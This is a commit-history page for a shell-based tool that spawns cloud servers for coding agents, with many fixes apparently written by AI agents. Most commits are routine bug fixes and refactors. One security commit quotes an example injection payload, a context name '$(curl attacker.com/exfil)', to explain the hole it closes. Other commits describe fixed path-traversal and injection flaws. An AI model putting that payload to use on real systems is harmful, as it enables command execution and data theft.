Commit graph

50 commits

Author SHA1 Message Date
A
9b6e860bba
fix: hetzner destroy_server false failure and daytona silent error swallow (#1622)
Hetzner: grep '"error"' matched '"error": null' in successful DELETE
responses, causing every server deletion to log "Failed to destroy
server" and return 1 even when the server was actually destroyed.
Fix: use jq -e '.action' (consistent with create_server's approach)
which is only present on success.

Daytona: >/dev/null 2>&1 || true suppressed all errors and always
logged "Sandbox destroyed" regardless of outcome. Fix: capture response,
check exit code and error JSON fields, log billing warning on failure.

Same class of bug as AWS (#1606) and GCP/DigitalOcean (#1615).

Agent: team-lead

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-21 18:12:24 -05:00
A
2c214c2f5b
fix: call ensure_jq before jq usage in hetzner and daytona libs (#1541)
Both cloud_authenticate() functions use jq for JSON construction in
create_server() but never verify jq is installed. On minimal Ubuntu/
Debian, Alpine, or fresh macOS without Homebrew, this causes a hard
failure with "jq: command not found" after the user has already entered
their API token. ensure_jq() in shared/common.sh auto-installs jq on
Linux/macOS -- wire it in before the first jq-dependent call.

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-20 22:00:09 -05:00
A
32db000ca4
fix: validate env-var tokens and align cloud_authenticate patterns (#1516)
- ensure_api_token_with_provider now validates env-var tokens with
  the provider test function, matching config-file token behavior.
  Previously, stale env-var tokens silently passed auth and failed
  at server creation with cryptic API errors.

- Add prompt_spawn_name to Hetzner and Daytona cloud_authenticate,
  matching the pattern used by AWS, Fly, GCP, DigitalOcean, and
  Sprite. Without this, SPAWN_NAME_KEBAB is never set and server
  name prompts have no pre-filled default on these two providers.

- Remove redundant register_cleanup_trap from DigitalOcean
  cloud_authenticate. shared/common.sh auto-registers the trap at
  source time (line 3696), making the explicit call dead code.

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-20 04:55:35 -05:00
Ahmed Abushagur
95137ed2c7
fix: rewrite hetzner common.sh + fix token prompt bug (#1512)
* fix: rewrite hetzner common.sh + fix token prompt bug in shared/common.sh

Hetzner: rewrote from 621 to 224 lines. Removed hcloud CLI dual-path
fallback, server type validation/fallback chain (11 functions), and
duplicate CLI+API implementations. Now API-only like DigitalOcean.

Shared: fixed echo "" in _prompt_for_api_token, get_openrouter_api_key_manual,
and get_openrouter_api_key_oauth writing to stdout instead of stderr.
These functions are called inside $(...) command substitutions, so the
newlines got prepended to the captured token, causing "unable to
authenticate" errors when pasting tokens at the prompt.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: rewrite daytona common.sh — API-only, drop CLI dependency

Rewrote from 312 to 174 lines. Removed daytona CLI dependency in
favor of direct REST API calls. Matches the same API-only pattern
used by Hetzner, DigitalOcean, and other clouds.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: pass SSH port to control master exit in daytona interactive/destroy

The ssh -O exit command to close the multiplexed master was missing
the -p PORT flag when DAYTONA_SSH_PORT is set. This left the master
connection open, causing "mux_client: master did not respond" errors
when the interactive session tried to allocate a PTY.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-20 02:52:49 -05:00
L
d5690a8b11
feat: spawn name prompt + kebab resource naming across all clouds (#1507)
* feat: add spawn name prompt and project confirmation to GCP flow

Ask for spawn name upfront (before auth), derive kebab-case default for
VM naming, and confirm the current GCP project before using it.

New interaction order:
  1. Spawn name: "My Dev Box" → kebab "my-dev-box" exported as
     GCP_INSTANCE_NAME_KEBAB
  2. gcloud auth + project confirm: "Current project: X  Keep? [Y/n]"
     If no → project picker shown
  3. SSH key
  4. Machine type picker (existing)
  5. Zone picker (existing)
  6. Instance name prompt: "Instance name [my-dev-box]: "
     User can press Enter to accept or type a custom name

New functions:
  _to_kebab_case()         — lowercases, replaces non-alnum with hyphens
  _gcp_prompt_spawn_name() — prompts for display name, exports kebab default;
                             honours SPAWN_NAME env var set by CLI (--name flag)

Modified:
  _gcp_resolve_project()  — adds Y/n confirmation when project already set
  get_server_name()       — shows kebab default in prompt, accepts Enter
  cloud_authenticate()    — calls _gcp_prompt_spawn_name first

Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>

* feat: add spawn name prompt to all clouds via shared/common.sh

Move _to_kebab_case() and prompt_spawn_name() to shared/common.sh so all
clouds get upfront spawn name prompting and kebab-based resource naming.

shared/common.sh:
  + _to_kebab_case()    — "My Dev Box" → "my-dev-box"
  + prompt_spawn_name() — asks for display name, exports SPAWN_NAME_DISPLAY
                          and SPAWN_NAME_KEBAB; skips if already set;
                          honours SPAWN_NAME env var from CLI --name flag
  ~ get_resource_name() — replaces silent SPAWN_NAME fallback with a visible
                          prefilled default: "Enter server name [my-dev-box]: "

Per-cloud changes (cloud_authenticate gains prompt_spawn_name first):
  hetzner, fly, aws, daytona, digitalocean, sprite — one-line change each

gcp/lib/common.sh:
  - Remove _to_kebab_case()        (now in shared)
  - Remove _gcp_prompt_spawn_name() (now in shared as prompt_spawn_name)
  ~ cloud_authenticate: _gcp_prompt_spawn_name → prompt_spawn_name
  ~ get_server_name: simplified back to get_validated_server_name
    (shared get_resource_name now shows the kebab default in the prompt)

Result — every cloud shows this flow upfront:
  Spawn name (e.g. "My Dev Box"): My Claude Box
  ℹ Resource name: my-claude-box
  ...
  Enter server name [my-claude-box]: ⏎

Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>

* fix: use "Use project '...'?" instead of "Keep this project?" in GCP prompt

Co-Authored-By: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 (1M context) <noreply@anthropic.com>
2026-02-19 22:22:59 -08:00
Ahmed Abushagur
749ca907b7
fix: Hetzner reprompt for different API key on account limits (#1494)
When server creation fails with account-level errors (server limit
reached, insufficient funds, quota exceeded), offer to switch to a
different Hetzner API token and retry instead of just failing.

- Add _is_hetzner_account_error() to detect account-level issues
- Return exit code 2 from create_server() for account errors
- cloud_provision() catches code 2, prompts "Try a different account?"
- On yes: re-prompts for new API key, re-registers SSH keys, retries

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-19 20:40:20 -05:00
Ahmed Abushagur
f2795a6d84
fix: Node.js v22 upgrade, aider uv install, SSH & cloud reliability (#1440)
* fix: use uv --upgrade to ensure Python 3.13-compatible Pillow across all clouds

aider-chat on Python 3.13 fails with `ImportError: cannot import name
'_imaging' from 'PIL'` when an old Pillow version (pre-10.4) is resolved
— those releases have no Python 3.13 binary wheels, so the C extension
is missing at runtime.

Replace `--with 'Pillow>=10.2.0'` (which was silently broken — the `>`
and single quotes get mangled by `printf '%q'` in run_server before the
command reaches the remote machine) with `--upgrade`, which forces all
transitive deps including Pillow to their latest compatible versions.

Also adds a plain-text echo before the install so users see progress
instead of a silent hang during the 2-4 minute install.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* test: update aider/gptme/interpreter assertions from pip to uv

The install method for aider, gptme, and open-interpreter was changed
from pip to `uv tool install` across all clouds. The mock test
assertions still checked for the old `pip.*install.*` patterns, causing
9 failures (3 agents × 3 clouds).

Update patterns to match the actual `uv tool install` commands now used
in all cloud scripts.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* ci: trigger test run for uv assertion fix

* fix: prevent SSH hangs, restore stderr, fix command escaping across clouds

- Add < /dev/null to ssh_run_server and generic_ssh_wait to prevent SSH
  stdin theft causing sequential install/verify/configure steps to hang
- Add ServerAliveInterval, ServerAliveCountMax, ConnectTimeout to default
  SSH_OPTS so long-running installs don't silently drop on flaky networks
- Remove 2>/dev/null from Fly.io run_server so remote command errors are
  no longer silently swallowed (--quiet flag still suppresses flyctl noise)
- Fix Fly.io printf '%q' double-quoting: remove extra quotes around
  $escaped_cmd that prevented the remote shell from consuming escapes,
  breaking && || | operators in commands
- Remove broken printf '%q' from Daytona run_server and interactive_session
  where it escaped shell operators into literal characters since daytona exec
  has no intermediate shell layer
- Pin aider to --python 3.12 instead of --with audioop-lts across all clouds

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add --pty to fly ssh console for interactive sessions

fly ssh console -C does not allocate a pseudo-terminal by default,
causing interactive TUI agents (aider, claude) to fail with
"Input is not a terminal (fd=0)" or completely unresponsive input.

Adding --pty forces PTY allocation, matching how other clouds handle
interactive sessions (SSH uses -t, Sprite uses -tty).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: prepend ~/.local/bin to PATH in ssh_run_server

After uv installs to ~/.local/bin, the current shell session doesn't
have it in PATH, causing "uv: command not found" on DigitalOcean and
all other SSH-based clouds (Hetzner, AWS, GCP, OVH).

Fly.io's run_server already prepends this PATH — now the shared
ssh_run_server does the same, fixing all SSH-based clouds at once.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add Node.js to cloud-init for all cloud providers

npm-based agents (codex, kilocode, etc.) fail with "npm: command not
found" because Node.js isn't installed during cloud-init. Fly.io was
the only provider installing Node.js (in wait_for_cloud_init).

Now all cloud-init scripts install Node.js v22 LTS from nodesource,
matching Fly.io's setup. Also adds ~/.local/bin to PATH in AWS and
GCP cloud-init (was already in shared/DigitalOcean/Hetzner).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: use apt packages for nodejs/npm instead of nodesource

The nodesource setup script (setup_22.x) runs its own apt-get update
and repository configuration, nearly doubling cloud-init time and
causing hangs on DigitalOcean. Ubuntu 24.04 includes nodejs and npm
in its default repos — just add them to the packages list.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: add timeouts and better error handling to Daytona CLI commands

Daytona CLI commands (login, list, create) can hang indefinitely when
the API is slow or unreachable. This causes:
- "Failed to create sandbox: timeout" with no recovery
- Token validation timeouts misreported as "invalid token"
- Users re-entering valid tokens that also timeout

Fixes:
- Wrap all daytona CLI calls with timeout (30s for auth, 120s for create)
- Detect timeout errors separately from auth errors
- Show actionable "try again / check status" messages for timeouts
- Add nodejs/npm to Daytona wait_for_cloud_init

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: set DAYTONA_API_URL to Daytona Cloud by default

The Daytona CLI may default to connecting to a local self-hosted
server instead of Daytona Cloud. Without DAYTONA_API_URL set to
https://app.daytona.io/api, every CLI command (login, list, create)
hangs trying to reach a non-existent local server and times out.

The SDK documents this as the default, but the CLI doesn't always
pick it up — now we export it explicitly.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: symlink n-installed Node.js v22 over apt v18 to prevent shadowing

n installs Node.js v22 to /usr/local/bin/node but apt's v18 at
/usr/bin/node can shadow it in non-interactive SSH sessions. After
n 22, symlink the new binaries over the apt ones so v22 is always
resolved. Also fix hcloud CLI token extraction for new TOML format.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address security review, add curl timeouts to trigger workflows

- Fix ssh_run_server command injection concern: use single-quoted
  path_prefix so $HOME/$PATH expand remotely, not locally
- Add --connect-timeout 15 --max-time 30 to trigger workflows to
  prevent 5-min hangs when server streams responses
- Handle 409 (dedup) as success — expected when cron fires every 15min
  but cycles take 35min
- Reduce workflow timeout-minutes from 5 to 2

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-02-18 06:54:07 -05:00
Ahmed Abushagur
633ce8eaac
feat: upgrade default server sizes, fix Fly.io agent installs, improve E2E tests (#1428)
- Upgrade default VM sizes across clouds for better agent performance:
  - Hetzner: cpx11 → cx23 (with cx22 fallback support for deprecated types)
  - DigitalOcean: s-2vcpu-2gb → s-2vcpu-4gb
  - Daytona: 2048MB → 4096MB memory
  - Oracle: VM.Standard.E2.1.Micro → VM.Standard.A1.Flex
  - OVH: d2-2 → d2-4
- Fix Fly.io agent failures:
  - Add Node.js + build-essential to wait_for_cloud_init (fixes npm-based agents)
  - Prepend PATH in interactive_session (fixes "source not found" errors)
- Fix openclaw installs across clouds: use explicit PATH export instead of source
- Fix DigitalOcean token validation (check "uuid" not "id")
- Fix AWS cloud-init: chown .bashrc/.zshrc to ubuntu user
- Improve Hetzner fallback: add "cheapest available" as last-resort fallback
- Upgrade E2E tests: per-combo auto-fix, credential collection, robustness fixes

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-17 22:17:08 -08:00
A
edb475e3d2
security: fix command injection in hetzner token extraction (#1418)
Fixes #1411

Replaced unsafe xargs -I{} pattern with grep -F for literal string matching
to prevent command injection if the hcloud context name contains shell
metacharacters.

Previous code: xargs interpolated context name directly into grep pattern
New code: grep -F treats context name as literal string (no interpretation)

Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)'
could execute arbitrary commands during token extraction.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 14:08:31 -05:00
A
30138f6a8a
security: fix path traversal in CLI installer and hetzner token extraction (#1379)
Fixes #1376 - HIGH severity path traversal in CLI installer
Fixes #1377 - MEDIUM severity unquoted variable in hetzner token extraction

Changes:
- cli/install.sh: Replace string prefix matching with canonicalized path
  comparison to prevent path traversal in rm -rf cleanup. The previous
  check could be bypassed with sequences like "/tmp/../../home/user".
- hetzner/lib/common.sh: Quote xargs placeholder variable to prevent
  unexpected behavior if hcloud context name contains shell metacharacters.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-17 01:51:13 -05:00
A
c4eccbd72f
feat: prioritize clouds with CLI installed + hcloud CLI integration (#1375)
* fix: auto-run gcloud auth login on expired GCP tokens

Instead of telling users to run `gcloud auth login` manually, just
run it automatically when auth check fails or instance creation hits
a reauthentication error, then retry.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: prioritize clouds with CLI installed + hcloud CLI integration

When selecting a cloud provider, clouds are now sorted in 3 tiers:
1. Credentials detected (env vars set) — top priority
2. CLI installed (e.g., gcloud, hcloud, aws) — middle priority
3. Neither — default order

Also adds hcloud CLI-first support for Hetzner operations (server
create/delete/list, SSH key management, auth) with automatic fallback
to the existing REST API when hcloud is not available.

Closes #1370

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor: rename aws-lightsail to aws across the project

Simplifies the cloud key from "aws-lightsail" to "aws" — AWS should
have a single entry regardless of the underlying service used.

Renames the directory, updates manifest.json matrix keys, CLI map,
test fixtures, README, and all agent scripts.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-16 20:12:35 -08:00
A
8d533d3908
fix: add error handling for critical ID/IP extraction failures (#1323)
Prevent silent failures when cloud API responses don't contain expected
server/instance IDs or IPs. Without these checks, scripts would continue
with empty variables, leading to cryptic failures downstream (e.g., "ssh
root@" or API calls with empty IDs).

Changes:
- fly: Check FLY_MACHINE_ID after extraction, fail fast with clear error
- ovh: Check OVH_INSTANCE_ID after extraction, fail fast with clear error
- hetzner: Check HETZNER_SERVER_ID and HETZNER_SERVER_IP (+ null check for jq)
- digitalocean: Check DO_DROPLET_ID after extraction, fail fast with clear error

Impact: Improves reliability by catching API response parsing failures
immediately rather than propagating empty values to SSH/API calls.

Agent: code-health

Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-16 20:22:48 -05:00
Ahmed Abushagur
758b575658
feat: add server lifecycle management (reconnect + delete) (#1363)
Wire up connection tracking across all 10 clouds so users can reconnect
to and delete previously spawned servers via `spawn list` and `spawn delete`.

Phase 1 - Connection tracking:
- Extend save_vm_connection() with cloud and metadata params
- Add save_vm_connection to create_server() in all cloud libs
- Extend VMConnection with cloud, deleted, deleted_at, metadata fields

Phase 2 - Delete via interactive picker:
- Add "Delete this server" option to spawn list picker
- Build delete scripts that reuse each cloud's destroy_server()
- Confirmation UX with spinner feedback
- Soft-delete marking in history (deleted records show [deleted])

Phase 3 - Standalone delete command:
- spawn delete (aliases: rm, destroy) with interactive picker
- Filter support: spawn delete -a <agent> -c <cloud>

Also improves reconnect hints for Fly (fly ssh console) and
Daytona (daytona ssh) connections.

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-16 17:06:49 -08:00
A
ec81c74594
refactor: introduce cloud adapter + spawn_agent runner system (#1340)
Eliminate ~70% boilerplate across 149 agent scripts by introducing a
standard cloud_* adapter interface and spawn_agent orchestration runner.

Each cloud's lib/common.sh now exports 7 adapter functions (cloud_authenticate,
cloud_provision, cloud_wait_ready, cloud_run, cloud_upload, cloud_interactive,
cloud_label) that wrap cloud-specific operations behind a uniform interface.

Agent scripts define hooks (agent_install, agent_env_vars, agent_launch_cmd,
etc.) and call `spawn_agent "Agent Name"` — the runner handles the full
deployment flow: auth → provision → wait → install → API key → env → config → launch.

- shared/common.sh: add spawn_agent(), _fn_exists(), _spawn_inject_env_vars()
- 10 cloud lib/common.sh files: add cloud_* adapter functions
- 149 agent scripts: rewrite to hook pattern (~40-80 lines → ~20-35 lines)
- test/run.sh: update 2 sprite test patterns for new adapter paths
- Net reduction: ~4,300 lines (2,257 added, 6,563 removed)

Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-16 16:25:44 -08:00
A
7609cf2d6f
refactor: reduce complexity in OAuth and Hetzner validation functions (#1132)
Extract helper functions to simplify complex control flow:
- try_oauth_flow: Extract _start_oauth_session_with_server helper to handle server startup phase, improving readability and testability
- _hetzner_resolve_server_type: Extract _hetzner_log_validation_error and _hetzner_log_type_change helpers to separate error handling logic from main flow

These changes reduce nesting levels and improve function cohesion while maintaining identical behavior.

Agent: complexity-hunter

Co-authored-by: spawn-refactor-bot <refactor@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 17:43:05 -05:00
A
f121b60d80
fix(ux): show post-session summary with server status and reconnect info (#1037)
After an interactive SSH session ends, users are now shown:
- A warning that their server is still running (and may incur charges)
- A link to the cloud provider's dashboard to manage/delete it
- The SSH command to reconnect

This prevents users from unknowingly leaving servers running after
exiting their agent session. Covers all 25 SSH-based cloud providers.

Agent: ux-engineer

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-13 20:06:40 -05:00
A
5ebe3e5a13
fix: add actionable guidance to destroy_server failures and service timeouts (#959)
When server destruction fails, users are left with a bare error message and
no indication that they may still be billed for a running server. This adds
dashboard URLs and clear warnings to destroy_server errors across 9 clouds
(Hetzner, UpCloud, Contabo, Netcup, RamNode, Hostinger, HOSTKEY, OVH,
Latitude). Also improves error messages for Koyeb (app creation, service
deployment, deployment timeout, instance ID), GitHub Codespaces (creation
failure, readiness timeout), and E2B (sandbox creation failure).

Agent: ux-engineer

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-13 09:38:58 -08:00
A
3c3c697ea5
fix: json_escape SSH key names and fix GCP metadata injection (#958)
SSH key registration in 11 cloud providers used unescaped key_name
directly in JSON request bodies. If the hostname (used to generate
key names) contained JSON-special characters like double-quotes, it
could break out of the JSON string and inject arbitrary JSON fields.

Fix: use json_escape for key_name in all providers, matching the
pattern already used by Scaleway.

Also fix GCP create_server which embedded the startup script inline
in --metadata with comma delimiters. Commas in the script could break
metadata parsing or inject additional metadata keys. Fix: use
--metadata-from-file for the startup script.

Affected providers: Hetzner, DigitalOcean, Vultr, BinaryLane,
Hostinger, Contabo, Cherry, HOSTKEY, Civo, Linode, Genesis Cloud, GCP.

Agent: security-auditor

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-13 09:03:35 -08:00
A
51d217add1
refactor: deduplicate _ensure_jq and decompose DO create_server (#943)
- Extract `ensure_jq()` from hetzner and hostkey into shared/common.sh,
  eliminating 64 lines of identical duplicated code
- Decompose DigitalOcean `create_server()` by extracting error handling
  into `_do_check_create_error()` helper, and using the shared
  `extract_api_error_message` instead of inline Python parsing
- Use shared `_extract_json_field` for droplet ID extraction

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-13 07:25:08 -08:00
A
de5a0c16de
refactor: extract helpers from Hetzner server type validation (#845)
Break down _validate_server_type_for_location (74 lines -> 29 lines) and
create_server (64 lines -> 43 lines) by extracting focused helpers:

- _hetzner_get_available_ids: fetch datacenter availability data
- _hetzner_find_fallback_type: search for compatible alternative types
- _hetzner_resolve_server_type: handle validation errors and fallback logging

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
2026-02-13 02:14:30 -08:00
A
a96b310861
refactor: reduce complexity in Hetzner _validate_server_type_for_location (#831)
- Extract _hetzner_find_candidates helper to eliminate duplicated jq
  candidate-search logic (same-family and any-family searches were
  nearly identical 15-line blocks)
- Consolidate 3 separate jq calls for wanted_cpu/cores/memory into
  a single jq invocation
- Replace duplicated replacement-picking code with a loop over
  family strategies

Function reduced from 106 to ~72 lines (plus 17-line reusable helper).

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-12 23:52:17 -08:00
L
6633873ccc
refactor: replace Python with jq in Hetzner lib, fix /lab → /labs URLs (#827)
Hetzner lib: replace all Python JSON parsing with jq. Uses the
/datacenters API as the authoritative source for server type
availability (server_types.available), cross-referenced with
/server_types for specs and pricing. jq is auto-installed if missing.

URLs: update openrouter.ai/lab/spawn → openrouter.ai/labs/spawn
across all READMEs and CLI source.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-12 23:14:11 -08:00
L
720753c644
fix: validate Hetzner server type availability at selected location (#825)
When HETZNER_SERVER_TYPE and HETZNER_LOCATION are both pre-set (e.g. by
automated scripts), there was no validation that the type is actually
available at that location. ARM types like cax11 are only available in
EU datacenters, causing "unsupported location for server type" errors
when paired with US locations like ash.

Now create_server validates the type against the Hetzner /datacenters
API (server_types.available) before attempting creation. If incompatible,
it auto-selects the cheapest compatible alternative (same CPU family,
>= specs) and warns the user.

Uses jq for JSON parsing (auto-installed if missing) and the Hetzner
/datacenters + /server_types APIs for authoritative availability data.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-12 23:01:37 -08:00
A
fde0ed16b6
refactor: extract shared extract_api_error_message helper to reduce inline Python duplication (#767)
Replace 10 inline `python3 -c "import json,sys; d=json.loads(...)..."` one-liners
across vultr, hetzner, digitalocean, and contabo with calls to a new shared
`extract_api_error_message` helper in shared/common.sh. The helper tries common
JSON error field patterns (message, error, error.message, error.error_message,
reason) and falls back to a caller-specified default.

This pattern appears 35+ times across cloud libs; this PR converts the first 4
clouds as a proof of concept. Remaining clouds can adopt incrementally.

Net reduction: 10 lines per converted cloud (~3 lines saved per call site).

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-12 16:47:20 -08:00
A
4b0d25ca39
fix: prevent Python code injection via unescaped variables in inline Python (#771)
Use sys.argv to pass shell values to inline Python instead of direct
string interpolation, preventing single-quote injection attacks across
cloud lib common.sh files and test/record.sh.

Also fix eval injection in test/record.sh try_load_config() by replacing
eval of Python-generated export statements with safe tab-separated
parsing and direct variable assignment.

Fixes #759
Fixes #760

Agent: security-auditor

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-12 16:47:13 -08:00
A
7c693db35b
refactor: extract check_ssh_key_by_fingerprint into shared helper (#552)
13 cloud providers had identical 5-line check_ssh_key functions that
fetch SSH keys from the provider API and grep for the fingerprint.
Extract this pattern into a shared check_ssh_key_by_fingerprint helper
in shared/common.sh, reducing each cloud's function to a single line.

Affected clouds: BinaryLane, Cherry, Civo, Contabo, DigitalOcean,
Genesis Cloud, Hetzner, Hostinger, Latitude, Linode, OVH, Scaleway,
Vultr.

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-11 16:12:07 -08:00
A
be5f9f1087
refactor: extract get_validated_server_name to eliminate 18 duplicate get_server_name functions (#535)
18 cloud lib/common.sh files had identical 7-line get_server_name()
functions (get_resource_name + validate_server_name + echo). Added a
shared get_validated_server_name helper to shared/common.sh and replaced
all duplicates with one-line delegations. Net -110 lines.

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-11 14:42:09 -08:00
A
10a40ca574
fix: add log_step for progress messages, fix misleading prompt error (#440)
- Add log_step() function (cyan) for status/progress messages
- Convert misused log_warn calls to log_step in shared/common.sh
  (14 instances: SSH key gen, agent verification, waiting, configuring)
- Convert representative cloud scripts: hetzner, digitalocean, sprite
- Fix misleading validatePrompt error that suggested --prompt-file as a
  workaround when it has the same validation

Agent: ux-engineer

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-11 04:28:17 -08:00
A
fdc5d5e58b
refactor: extract shared SSH helpers to eliminate ~410 lines of duplication (#429)
Add ssh_run_server, ssh_upload_file, ssh_interactive_session, and
ssh_verify_connectivity to shared/common.sh. These four functions
were copy-pasted identically across 21 cloud provider lib files,
differing only in SSH username (root vs ubuntu).

Providers now set SSH_USER and delegate to the shared helpers via
one-line wrappers, reducing each provider's lib by ~20 lines.

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-11 03:45:18 -08:00
A
ba5cdd8c3c
refactor: extract helpers from create_server() in hetzner and hostinger (#425)
Extract JSON body builders and error handlers from the two largest
remaining create_server() functions (hetzner 84->43, hostinger 76->44
lines), following the pattern established in PR #423.

Extracted helpers:
- hetzner: _hetzner_build_create_body(), _hetzner_check_create_error()
- hostinger: _hostinger_build_create_body(), _hostinger_handle_create_error()

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-11 03:19:54 -08:00
A
ccd7ff013a
refactor: reduce complexity by extracting shared interactive_pick() and using ensure_api_token_with_provider() (#411)
- Extract interactive_pick() to shared/common.sh: generic numbered-menu
  picker that replaces 4 duplicate _pick_location/_pick_server_type/_pick_plan
  functions across hetzner and hostinger (156 lines -> 71 lines)
- Replace ensure_fly_token() (53 lines) with ensure_api_token_with_provider()
  plus a flyctl CLI auth pre-check (17 lines)
- Replace ensure_render_api_key() (38 lines + _save_render_api_key 8 lines)
  with ensure_api_token_with_provider() (6 lines)

Net reduction: 156 lines removed across 5 files. No functionality changes.

Agent: complexity-hunter

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Haiku 4.5 <noreply@anthropic.com>
2026-02-11 01:42:22 -08:00
Ahmed Abushagur
8b9f9a0e5a
QA-Bot setup (#335)
* feat: testing

* feat: auto-fix dead apis

* fix: mock works

* feat: new fixtures

* fix: more clouds tested

* fix: dry run fix

* fix: civo valid size

* fix: civo result wait

* feat: fixtures

* feat: per cloud agent
2026-02-10 19:51:07 -08:00
A
b0f924b511
fix: Prevent Python/shell injection via env vars and triple-quote strings (#102)
- Fix triple-quote injection in SSH keys (Scaleway, UpCloud), userdata
  (BinaryLane), init scripts (Civo, Kamatera), and GraphQL queries
  (RunPod) by passing data via stdin/json_escape instead of inline
  string interpolation
- Add input validation for all cloud provider env vars (region, type,
  plan, etc.) using validate_region_name/validate_resource_name to block
  shell metacharacters before they reach Python string interpolation
- Validate Modal image name as Python identifier to prevent code injection
- Validate numeric env vars (RAM, GPU count, disk size) across all providers

Affects: 19 cloud provider lib/common.sh files
Agent: security-auditor

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-02-09 10:22:39 -08:00
A
1bd7b1bd07
feat: Add community-coordinator agent to refactor team (#64)
* ux: Improve error messages and user guidance across CLI and shell scripts

Enhanced error messages to be more actionable and user-friendly:

CLI improvements (commands.ts):
- Made validateNonEmptyString clearer: "is required but was not provided"
- Reordered troubleshooting steps to check matrix first (most common issue)
- Simplified 404 error message: "doesn't exist yet" vs "may not be implemented"
- Changed "Troubleshooting steps" to just "Troubleshooting" (less formal)

Shared library improvements (shared/common.sh):
- OAuth cancellation now explains why API key is needed and where to get it
- safe_read non-TTY error explains what non-interactive mode is with example
- get_resource_name error shows exact env var syntax needed
- Agent verification failures now list specific possible causes
